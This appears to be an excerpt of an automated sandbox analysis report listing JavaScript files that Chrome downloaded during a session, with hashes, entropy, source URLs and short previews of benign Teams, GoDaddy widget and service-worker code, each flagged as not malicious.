                                                                                                                                                                                                                          SSDEEP:6:FSPD8WUDDSBSyFbNemGHr9EJiKWaEwI8WUDDn:c5UDGBSyCTHr+pWTwGUDr
                                                                                                                                                                                                                          MD5:8F12765EB30FBDCFCDC116D13F7FC272
                                                                                                                                                                                                                          SHA1:506E45B7D3930756EACCE0DAD449A3C8CDB3EAC6
                                                                                                                                                                                                                          SHA-256:265995EB76326E95613750F6F6570B850F5C22280D262DE9B9632A16CEB98B9B
                                                                                                                                                                                                                          SHA-512:7AA2F396B105BCCF2B943FD2AC60929D8BF3A0EB8574B77451CB29816DF8ACDCD07694B526D7E4585F849DFDA3A0FE6E95661179E13F682DBF54098D98154BFB
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-navigationDrawer-27f5f1f5.js
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-navigationDrawer-27f5f1f5.js",["exports"],(function(i){"use strict";i.N="-249vw"})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-navigationDrawer-27f5f1f5.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1179)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):1287
                                                                                                                                                                                                                          Entropy (8bit):5.226870802404122
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:24:wp3sp38nmCamm7wybSHIoWLTMz0r1eTM9oWoWOuTf+Udtk7Sz+KIJYbOc:wp3sp3j/VTMzBAfrf+wtXz1IOZ
                                                                                                                                                                                                                          MD5:B6D1A6A743B008B467C2395A4485F390
                                                                                                                                                                                                                          SHA1:899A6E8EE6B23EE0E49F0B89C33ED5CB4B722226
                                                                                                                                                                                                                          SHA-256:F1F36623804CDDD4D5A0FB0FD6C3C30E45FE86DBE5D7C2FAE78298F8E7545A36
                                                                                                                                                                                                                          SHA-512:49AEF8E6862D335E794C13A91651A3DE375B3A1AAD5604B73D015657DE39104D86C1283F5347B1D92C733449F53AC0DBF001A98DEE2C8C157EF793EF7EC01063
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/120951-1965c2e12a30acee.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[120951],{120951:(e,a,t)=>{t.d(a,{D:()=>i});var s=t(513432),l=t(395225),n=t.n(l),c=t(485529),r=t(829289),i=(0,c.Ke)({svg:function(e){var a=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:a.svg},s.createElement("path",{className:n()(r.Q.outline,a.outlinePart),d:"M15.8527 7.64582C16.0484 7.84073 16.0489 8.15731 15.854 8.35292L10.389 13.8374C10.1741 14.0531 9.82477 14.0531 9.60982 13.8374L4.14484 8.35292C3.94993 8.15731 3.95049 7.84073 4.1461 7.64582C4.34171 7.4509 4.65829 7.45147 4.85321 7.64708L9.99942 12.8117L15.1456 7.64708C15.3406 7.45147 15.6571 7.4509 15.8527 7.64582Z"}),s.createElement("path",{className:n()(r.Q.filled,a.filledPart),d:"M15.793 7.73271C16.0787 8.03263 16.0672 8.50737 15.7672 8.79306L10.5168 13.7944C10.2271 14.0703 9.77187 14.0703 9.4822 13.7944L4.23173 8.79306C3.93181 8.50737 3.92028 8.03263 4.2059
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32815)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):32923
                                                                                                                                                                                                                          Entropy (8bit):5.433236752671521
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:RdSxMwawUxjFewyBUwr0yF51UEMGv3/Ic4RY7x7sLHLZU+4uW1S5olaXy+QwkwAz:97y/0GUEMvhR45m51Qwkwt+g1Se3Hs7f
                                                                                                                                                                                                                          MD5:C23D584D6EE8858DB2DC78E7877E069A
                                                                                                                                                                                                                          SHA1:1CBFCF0EE6AF2AF91027B0342E02DD70ABBF6B7E
                                                                                                                                                                                                                          SHA-256:A01C016B3B32011DA6CDB4861035E0EEC5BA2B31CE4EFC4CB140CC9BAF38BE8A
                                                                                                                                                                                                                          SHA-512:6B9E69A94D9F1D328FF688BC955EBF46F9CAC5ED9649C6662C5777C3F23D71703B94A8DDDCB106149F855039D7492B700E8FCEFCB8D024EB4915597F4F0A1146
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/856736-96dae80631262ffc.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[856736],{670262:(e,t,n)=>{n.d(t,{D:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataClientPlatformAppButtonQuery($appId:ID!) {appButtonResult(appId:$appId) @client {appId,action}}");return delete this.definitions,this.definitions=e.definitions}}},845857:(e,t,n)=>{n.d(t,{$:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataClientPlatformAppFocusEnterQuery($appId:ID!) {focusEnterHandlerState(appId:$appId) @client {appId,action}}");return delete this.definitions,this.definitions=e.definitions}}},298416:(e,t,n)=>{n.d(t,{A:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataClientPlatformAppFocusRegisterQuery($appId:ID!) {registerFocusEnterHandlerState(appId:$appId) @client {appId,isRegistered}}");return delete this.definitions,this.definitions=e.defini
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14080)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):14188
                                                                                                                                                                                                                          Entropy (8bit):4.548444802364332
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:morrVCmTcgu/dwwIXxmpnNnkkdYv+WRFqFK/WP5MABOH8P2oKullWqFjhRONOb+t:morrVrcgAIXxmEv+WDJw5MAB+B2hRcJt
                                                                                                                                                                                                                          MD5:EAE6D5D8A335D7E78B87A584045664BE
                                                                                                                                                                                                                          SHA1:16F37B3649C086DBC522F19D34C88F135DD62886
                                                                                                                                                                                                                          SHA-256:332670B50B9E5C00C333394FE7F1660E95B91A3BAC311A32B07C4623AD014BED
                                                                                                                                                                                                                          SHA-512:D26C7E0204E471EDFED62FCCD2384B74C70F40097BB0D9C03045279D277F61FD3B3B851B0037E8BE4A046A810D99650EA53A2722BCDE08F6BBD6AF85E1E05C74
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[499319],{499319:(a,l,c)=>{c.d(l,{fG6:()=>Z,emQ:()=>h,T$n:()=>r,Tw6:()=>m,nzA:()=>C,t3G:()=>L,kNP:()=>M,mXP:()=>U,CDg:()=>g,jvo:()=>u,FUA:()=>R,N5_:()=>A,orE:()=>o,SUw:()=>k,D7b:()=>n,xZD:()=>t,RaO:()=>i,FHz:()=>v,ghe:()=>s,kt0:()=>H,ZmR:()=>b,i3f:()=>d,pgR:()=>w,GxZ:()=>F,hoY:()=>p,rLf:()=>D,geq:()=>_,cmU:()=>V,sCR:()=>f,bP_:()=>G,nbA:()=>P,ba0:()=>S,nb6:()=>q,KOR:()=>N,qGP:()=>O,g4$:()=>x,nbk:()=>z,NaX:()=>Q,Aow:()=>T,s81:()=>X,oIL:()=>$,gcA:()=>j,qrO:()=>B,mse:()=>E,JcD:()=>I});var e=c(693935);const Z=(0,e.U)("ChannelShare20Regular","20",["M3 5.5A2.5 2.5 0 0 1 5.5 3h5A2.5 2.5 0 0 1 13 5.5a.5.5 0 0 1-1 0c0-.83-.67-1.5-1.5-1.5h-5C4.67 4 4 4.67 4 5.5v5c0 .83.67 1.5 1.5 1.5h4.51a2.25 2.25 0 1 1 .12 1H5.5A2.5 2.5 0 0 1 3 10.5v-5Zm8 6.75a1.25 1.25 0 1 0 2.5 0 1.25 1.25 0 0 0-2.5 0ZM7.5 14a.5.5 0 0 0-.5.5A2.5 2.5 0 0 0 9.5 17h5a2.5 2.5 0 0 0 2.5-2.5v-5A2.5 2.5 0 0 0 14.5 7H9.87A2.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (32878), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):32878
                                                                                                                                                                                                                          Entropy (8bit):5.232970247067213
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:8QMz7Xi7utc79QusIPgexnKnPxPC7JWU/VHeLNsiQk/c4ur2McV2xdnGYeCjWQTO:si79wq0xPCFWsHuCleZ0j/TsmUd
                                                                                                                                                                                                                          MD5:772487766993E995F7E3E136D25B9017
                                                                                                                                                                                                                          SHA1:2FEFC6BC70D01347ECE877BFEDD321D52C5B9CA8
                                                                                                                                                                                                                          SHA-256:0A766F1D1AB4779F571A403CB8B3242EF777E674A51AFE96123E69E525C33C0C
                                                                                                                                                                                                                          SHA-512:AEA751BCFF8FB5C0499464095F3D6ECD28E8F9EF33FE09169C33DE0B0AE58867F46AC8C302C4B68F5D54F4DEFCB85A74968F2C190E4815A7079C2977BB062702
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://sharefileon.com/sw.js
                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e={895:()=>{try{self["workbox:cacheable-response:6.4.1"]&&_()}catch(e){}},259:(e,t,s)=>{s.d(t,{B:()=>a}),s(913);class a{constructor(){this.promise=new Promise(((e,t)=>{this.resolve=e,this.reject=t}))}}},125:(e,t,s)=>{s.d(t,{V:()=>a}),s(913);class a extends Error{constructor(e,t){super(((e,...t)=>{let s=e;return t.length>0&&(s+=` :: ${JSON.stringify(t)}`),s})(e,t)),this.name=e,this.details=t}}},524:(e,t,s)=>{s.d(t,{h:()=>a}),s(125),s(913);const a=null},594:(e,t,s)=>{function a(e,t){const s=new URL(e);for(const e of t)s.searchParams.delete(e);return s.href}async function n(e,t,s,n){const r=a(t.url,s);if(t.url===r)return e.match(t,n);const i=Object.assign(Object.assign({},n),{ignoreSearch:!0}),c=await e.keys(t,i);for(const t of c)if(r===a(t.url,s))return e.match(t,n)}s.d(t,{F:()=>n}),s(913)},536:(e,t,s)=>{s.d(t,{x:()=>r}),s(913);const a={googleAnalytics:"googleAnalytics",precache:"precache-v2",prefix:"workbox",runtime:"runtime",suffix:"undefined"!=typeof registratio
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (23843)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):23950
                                                                                                                                                                                                                          Entropy (8bit):5.2873236427167285
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:d7gaa9LSV5yrS0SWSCSYSLSyO/OU/poVLvtmK6bzrCzfLxpBsxc07I2Bd:JgaAuV5fJljWyypoVL1mK6bzWzfn07Iq
                                                                                                                                                                                                                          MD5:0CD128F474BDB7DF9CBF23434A5AEF84
                                                                                                                                                                                                                          SHA1:A1C47BCD629EA66EF894708F616A46A282739FA4
                                                                                                                                                                                                                          SHA-256:625BF36E9521DE1869ACA6B774360102690962CE3860D8AE6E6FC0A8CAC14305
                                                                                                                                                                                                                          SHA-512:9E130DD780FBEF887C2ECC7EEB17A9CD52DACAAE7D44C604CA5C95EC9F5D3E5701BD8D54F1EA0ACE9C740D83BE9462BFF769AF9B64A32AF7C7B00FEEFBE68736
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[34655],{34655:(e,t,r)=>{r.d(t,{TL:()=>a,XY:()=>n,f2:()=>s,O4:()=>d,LD:()=>l,sj:()=>c,Ir:()=>C,lQ:()=>T,J2:()=>u,dy:()=>E,c1:()=>S,Kw:()=>I,N2:()=>m,Vx:()=>p,Xn:()=>A,Xk:()=>v,qj:()=>R,ak:()=>D,mA:()=>g,JN:()=>k,ow:()=>L,Tl:()=>F,XK:()=>U,Mh:()=>O});var a,i,n,o=r(724801);!function(e){e[e.Presenting=0]="Presenting",e[e.InCall=1]="InCall",e[e.InBroadcast=2]="InBroadcast",e[e.Interactive=3]="Interactive",e[e.Inactive=4]="Inactive",e[e.LongInactive=5]="LongInactive",e[e.Disabled=6]="Disabled",e[e.Disconnected=7]="Disconnected",e[e.Offline=8]="Offline",e[e.Uninitialized=9]="Uninitialized"}(a||(a={})),function(e){e.AppLogout="appLogout"}(i||(i={})),function(e){e[e.error=0]="error",e[e.warn=1]="warn",e[e.info=2]="info",e[e.verbose=3]="verbose"}(n||(n={}));const s={second:1e3,minute:6e4,tenMinutes:6e5};var d,l,c,C;!function(e){e.Deserialization="Deserialization",e.Unknown="Unknown",e.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (19349)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):19469
                                                                                                                                                                                                                          Entropy (8bit):5.469457610850632
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:0CH6vY11+WWdH4K481Bzy65hmGPg5f6+4UBev0DNK04476x39mFYVdACUmt5/7qQ:0CavY1v0HdBW65hc6+Fev08044s9mFqf
                                                                                                                                                                                                                          MD5:7F3F015837A71A5F44DB75E3AB4CE8C2
                                                                                                                                                                                                                          SHA1:2D4D1432798CCEFC1F9A1A3AA80707A7ED2296B4
                                                                                                                                                                                                                          SHA-256:E13A3426474D1993F36A0AE061DE6F4BD45CB68DCC68C903DEFE7C1DD8ED8482
                                                                                                                                                                                                                          SHA-512:D2B53FB9BE0DE75D5294273F5F7DC5909B585972495AE7ADB7EAEBA4B1C6AA95BDE5BE8AB05DC6C37DF25E71FC4B15285AD3A19F89274FADC853908298B9DB8A
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/839569-5ad0493aad697642.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[839569],{19493:(e,t,r)=>{var s;r.d(t,{Q:()=>s}),function(e){e[e.Missing=0]="Missing",e[e.Loading=1]="Loading",e[e.Loaded=2]="Loaded",e[e.Failed=3]="Failed"}(s||(s={}))},324011:(e,t,r)=>{r.d(t,{$n:()=>_,fj:()=>c,gI:()=>u,DU:()=>o,Co:()=>l,Xy:()=>m,lw:()=>h});const s=["aao","abh","abv","acm","acq","acw","acx","acy","adf","ads","ae","aeb","aec","afb","ajp","apc","apd","ar","arb","arc","arq","ars","ary","arz","auz","avl","ayh","ayl","ayn","ayp","bbz","bcc","bqi","ckb","dv","fa","glk","hbo","he","jpr","ku","men","mzn","nqo","pbt","pbu","peo","pes","pga","pnb","prd","prp","prs","ps","pst","sam","sd","shu","sqr","ssh","ug","ur","xaa","xmn","ydd","yhd","yi","yih","yud","pseudo_rtl"];var a=r(72393),n=r(802756);const i={af_ZA:1078,am_ET:1118,ar_AE:14337,ar_BH:15361,ar_DZ:5121,ar_EG:3073,ar_IQ:2049,ar_JO:11265,ar_KW:13313,ar_LB:12289,ar_LY:4097,ar_MA:6145,ar_OM:8193,ar_QA:16385,ar_SA:10
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):304
                                                                                                                                                                                                                          Entropy (8bit):5.609970428503769
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:FSPOhWNjZTivBSyv5F/kpIdiEjGWF+ktxRmGHr9EJiKWaEkWNjZTiKF:cUZBSyv5ZdihWF+CRTHr+pWTkAF
                                                                                                                                                                                                                          MD5:DAA79AD7558674F6A12D962ABF47F2F6
                                                                                                                                                                                                                          SHA1:03EEA0EBEBD11EC14CFA5A651EB0ACA2604829A7
                                                                                                                                                                                                                          SHA-256:604281887CD770ED21601933E9636A7A9C8A57A30D7D796AE7D760EEF64D5089
                                                                                                                                                                                                                          SHA-512:B335EBCB0C982398C56D9A5F68F5D4E36A850AB139976BD94354C7CD18F1F370866A74F46FCD399F46E410D59AF7FBA890A17003BB4FD456DD43A6DE531D28F9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@widget/LAYOUT/c/bs-searchFormLocations-c86f2a99.js
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-searchFormLocations-c86f2a99.js",["exports"],(function(o){"use strict";o.D="DESKTOP_NAV_COVER",o.M="MOBILE_NAV",o.N="NAV_DRAWER",o.S="SIDEBAR",o.a="DESKTOP_NAV"})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=bs-searchFormLocations-c86f2a99.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):326151
                                                                                                                                                                                                                          Entropy (8bit):5.071998687525131
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:Mt84atnFydxFqPyeKHQhgW1T2voThhkqTipRcnwZeC17ent:Y84atnFydxQPyZwXnvnt
                                                                                                                                                                                                                          MD5:F6381AB85F8A1415B6611E6B5B3216F9
                                                                                                                                                                                                                          SHA1:A98FFEF8FD054720D257DC676FBDF3D2D7B84471
                                                                                                                                                                                                                          SHA-256:C60AE71551DFECBA8CA8D7C7A05EC33B9F3C0EDD166F99A27C92CC0BC70156E2
                                                                                                                                                                                                                          SHA-512:EC2B5287A6EB1EDD52127DD49C4C976432CD8845669877D2C4C8DCF5C15894207769ED1AD0CF401113287F707A9187342A0082504A7A1782FF82441C086B324D
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(()=>{"use strict";var e,a,c,l,s,o,d,r,t,f,b,n,i,g,m,p={},h={};function u(e){var a=h[e];if(void 0!==a)return a.exports;var c=h[e]={id:e,loaded:!1,exports:{}};return p[e].call(c.exports,c,c.exports,u),h[e]&&u.ff&&delete p[e],c.loaded=!0,c.exports}u.m=p,u.c=h,u.ff=(()=>{try{return!JSON.parse(decodeURIComponent(document.head.getAttribute("data-config")))?.sidecars?.disableWebpackMemoryOptimization}catch{return!1}})(),u.amdO={},e="function"==typeof Symbol?Symbol("webpack then"):"__webpack_then__",a="function"==typeof Symbol?Symbol("webpack exports"):"__webpack_exports__",c=e=>{e&&(e.forEach((e=>e.r--)),e.forEach((e=>e.r--?e.r++:e())))},l=e=>! --e.r&&e(),s=(e,a)=>e?e.push(a):l(a),u.a=(o,d,r)=>{var t,f,b,n=r&&[],i=o.exports,g=!0,m=!1,p=(a,c,l)=>{m||(m=!0,c.r+=a.length,a.map(((a,s)=>a[e](c,l))),m=!1)},h=new Promise(((e,a)=>{b=a,f=()=>(e(i),c(n),n=0)}));h[a]=i,h[e]=(e,a)=>{if(g)return l(e);t&&p(t,e,a),s(n,e),h.catch(a)},o.exports=h,d((o=>{if(!o)return f();var d,r;t=(o=>o.map((o=>{if(null!==o&&
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (32044)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):32419
                                                                                                                                                                                                                          Entropy (8bit):5.797705170929871
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:EpWNBatM8Ed62M5uDMdjxE91u8MmbxScpv44rmjLoMCCfRz/6TBOgRZJCFE/b7fn:EMAxEtbwcpv44rK8MCCJz/6TBOgRZjn
                                                                                                                                                                                                                          MD5:D581DCBA24EDA38CCB1B9DCBFBA04576
                                                                                                                                                                                                                          SHA1:985D6D529A80396D0C476722FAF720691662A8B4
                                                                                                                                                                                                                          SHA-256:297960DE324847D359173E56354770E515F873302163D012EB415D293CD8D928
                                                                                                                                                                                                                          SHA-512:D3726B6F0BDC59E3C306B92B0372F8E94C64C1C5B95352C2EA36F952E8E12FDD7D48244A62CAC33E6816A9D32C84E3D930EE93BFA5B943982E4C9B5636BB015F
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/396573-d8961d04657e3b46.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[396573],{461190:(e,t,s)=>{var n,i,o;s.d(t,{pG:()=>n,Ly:()=>i,Mv:()=>o}),function(e){e.ComposeMessage="composeMessage",e.PostCompose="postCompose",e.MessageList="messageList",e.Powerbar="powerbar",e.VirtualTreeList="virtualTreeList",e.FeedsFilter="feedsFilter",e.PeoplePicker="peoplePicker",e.SearchBox="searchBox",e.Floodgate="floodgate",e.ChatListSearchFilter="chatListSearchFilter",e.ChannelListSearchFilter="channelListSearchFilter",e.CallingPerf="callingPerf",e.TeamsAndChannelsTable="teamsAndChannelsTable",e.DiscoverSurfaceFeedList="discoverSurfaceFeedList",e.AllChannelSystemMessages="channelInfoPaneAllSystemMessages",e.AllPinnedPosts="channelInfoPaneAllPinnedPosts",e.UnifiedFunPicker="unifiedFunPicker",e.CreateTeamGallery="createTeamGallery",e.AddMember="addMember",e.MeetForWorkList="meetForWorkList",e.MeetForWorkSearchFilter="meetForWorkSearchFilter",e.PeopleAppContactList=
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):272033
                                                                                                                                                                                                                          Entropy (8bit):5.56289564964125
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:3072:wu8IUu85pdmSO5TZTKUTn9TnwOTn9TnAp9elHvpdmSO3iTIT7JlDnDQj3jPNIzSK:5jNUfn2Y34xf1VXMoa
                                                                                                                                                                                                                          MD5:02F83EF51E6FDABE908DAF8A5488E15B
                                                                                                                                                                                                                          SHA1:7CE763E13894827694E511F4BBD2A96766550BEC
                                                                                                                                                                                                                          SHA-256:6CADC80D115050C4852901C13F89A631D7B324AF65479E2EF06438F6AFD0408D
                                                                                                                                                                                                                          SHA-512:1B8094F64AFEB883ED45919750CD5461F3AAEA4F51F2FAFD9D7344648F651CF4AC492C4113939F22A2E9814CC29086AAE2A3B4FE0F258877F7B740EF24E1AE43
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-index3-355e6d9f.js",["radpack","exports","~/c/bs-_rollupPluginBabelHelpers","~/c/bs-overlayTypes","~/c/bs-index2","~/c/bs-index","~/c/bs-dataAids","@wsb/guac-widget-shared@^1/lib/components/ColorSwatch","@wsb/guac-widget-shared@^1/lib/components/Carousel","~/c/bs-navigationDrawer","~/c/bs-searchFormLocations","@wsb/guac-widget-shared@^1/lib/components/DynamicFontScaler"],(function(e,t,a,r,o,l,n,i,c,s,g,p){"use strict";class u extends((global.Core||guac["@wsb/guac-widget-core"]).UX2.utils.createElement("Background")){}a._(u,"propTypes",{className:(global.PropTypes||guac["prop-types"]).string,backgroundSize:(global.PropTypes||guac["prop-types"]).string,backgroundPosition:(global.PropTypes||guac["prop-types"]).string,style:(global.PropTypes||guac["prop-types"]).object,imageData:(global.PropTypes||guac["prop-types"]).object,mobileWidthMultiplier:(global.PropTypes||guac["prop-types"]).number,desktopWidthMultiplier:(global.PropTypes||guac["prop-types"]).number,blu
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (36654)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):36762
                                                                                                                                                                                                                          Entropy (8bit):5.288359883284943
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:LXOQ44g23qw80xjOrb8pgInQhUzMpzRnzaqcpXR56d2g8Ke:AIXgInQW56Qg8p
                                                                                                                                                                                                                          MD5:1FB78A71F118BAC96FF6654EAD26BAFF
                                                                                                                                                                                                                          SHA1:5C6FF7F8096F0484CF6CCB016365A9616AB03A40
                                                                                                                                                                                                                          SHA-256:A008FCE5F9A5193555BB57D8E8BBDBA1F9646D5D69AA951856A5A299B463B449
                                                                                                                                                                                                                          SHA-512:48BB6DA6D399D3349ADF298B39E00B439ED60C14FCE0CAE006C5042A09B058CD7C3B79C21B0346A42CB84D369238033B4F4B728997B795DE57D5AA880BC7CDE8
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/690936-9e6744bf3934da2e.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[690936],{297689:(e,t,s)=>{var r;s.d(t,{MP:()=>r,C9:()=>i}),function(e){e.default="default",e.skypeConCore="conCore",e.mediaAgent="mediaAgent",e.CDL="CDL",e.copilot="copilot"}(r||(r={}));Object.entries(r).map((([e,t])=>({label:e,value:t})));const i=new Set(["AppInfo.ClientType","Window.Type","Panel.Context","Session.TelemetryWorkerType","AppInfo.ExpIds","UserInfo.ETag","UserInfo.HostETag","Window.Type","AppInfo.Version","AppInfo.ExperienceName"])},336223:(e,t,s)=>{s.d(t,{M:()=>S});var r=s(923890),i=s(156054),n=s(239857),a=s(368848);const o={maxStorageSizeInBytes:5e6,storageKeyPrefix:"Teams:telemetry-instrumentation-offline-storage",minPersistenceLevel:2,eventsLimitInMem:null,inMemoMaxTime:15e3,inStorageMaxTime:1008e4,maxRetry:1,maxBatchsize:63e3,maxSentBatchInterval:15e3};var h,l;!function(e){e[e.ONLINE=1]="ONLINE",e[e.OFFLINE=2]="OFFLINE"}(h||(h={})),function(e){e[e.INTERNAL=
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (21816)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):25268
                                                                                                                                                                                                                          Entropy (8bit):5.244661235597918
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:eK5KeeytKyV6bBGPMvSjLIoh0FFiSgNgbl3l:ecKeHiSnI4oiSgNgbr
                                                                                                                                                                                                                          MD5:B0C0EDD821FE30725B9CE18A9D08F412
                                                                                                                                                                                                                          SHA1:2E4E3CD4D3D7A95D6F9EA7B52B447E073102D5CE
                                                                                                                                                                                                                          SHA-256:81C4EA6D6E3BFAEDBF6F0F7534BD917175F8222C78E4AC140A29A493065632AB
                                                                                                                                                                                                                          SHA-512:26AEC53E62E0EA2AEC24C156CE7DBF07D985E64CC2F6721C63C79A523A8A430D32018757DA5E61F9B87AC58D1623BAD34943B69041E4801923FEF6CBE545E360
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@wsb/guac-widget-shared/lib/components/Carousel-7574d33c.js
